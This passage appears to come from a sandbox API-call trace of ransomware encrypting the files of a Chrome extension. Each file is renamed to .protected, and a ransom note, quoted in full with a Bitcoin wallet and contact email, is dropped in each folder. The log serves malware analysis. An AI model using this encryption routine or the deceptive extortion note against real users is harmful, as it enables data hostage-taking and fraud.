lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.076] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.076] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.076] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.076] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.076] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\.") returned 143 [0080.076] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.076] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.076] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.076] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.076] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.076] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.076] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.076] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\..") returned 144 [0080.076] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.076] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.076] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.076] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.076] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.076] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.076] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.076] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.076] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json") returned 155 [0080.076] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.076] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.076] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.076] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json") returned 155 [0080.078] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json") returned 155 [0080.078] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json") returned 155 [0080.078] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.078] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x11a, lpOverlapped=0x0) returned 1 [0080.079] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.079] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x11a, lpOverlapped=0x0) returned 1 [0080.079] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.079] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.079] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.079] CloseHandle (hObject=0x168) returned 1 [0080.079] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.protected") returned 165 [0080.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.protected")) returned 1 [0080.080] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.080] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.080] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\RESTORE_FILES.txt") returned 159 [0080.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.080] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.080] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.081] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.081] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.081] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.081] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.081] CloseHandle (hObject=0x164) returned 1 [0080.081] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.081] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0080.081] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0080.081] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0080.081] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0080.081] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0080.081] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu") returned 141 [0080.081] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0080.081] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0080.081] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\*") returned 143 [0080.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.081] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.081] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.081] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.081] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.081] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.081] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\.") returned 143 [0080.081] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.082] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.082] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.082] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.082] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.082] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.082] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.082] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\..") returned 144 [0080.082] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.082] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.082] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.082] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.082] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.082] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.082] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.082] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.082] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json") returned 155 [0080.082] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.082] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.082] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.082] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json") returned 155 [0080.082] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json") returned 155 [0080.082] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json") returned 155 [0080.082] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.082] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0080.083] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.083] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0080.084] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.084] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.084] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.084] CloseHandle (hObject=0x168) returned 1 [0080.084] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.protected") returned 165 [0080.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.protected")) returned 1 [0080.085] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.085] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.085] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\RESTORE_FILES.txt") returned 159 [0080.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.085] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.085] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.086] lstrlenA (lpString="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") returned 684 [0080.086] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.086] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.086] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.086] CloseHandle (hObject=0x164) returned 1 [0080.086] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.086] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0080.086] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0080.086] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0080.086] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0080.086] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0080.086] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id") returned 141 [0080.086] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0080.087] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0080.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\*") returned 143 [0080.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.087] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.087] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.087] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.087] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.087] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\.") returned 143 [0080.087] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.087] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.087] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.087] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.087] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.087] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.087] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\..") returned 144 [0080.087] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.087] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.087] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.087] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.087] 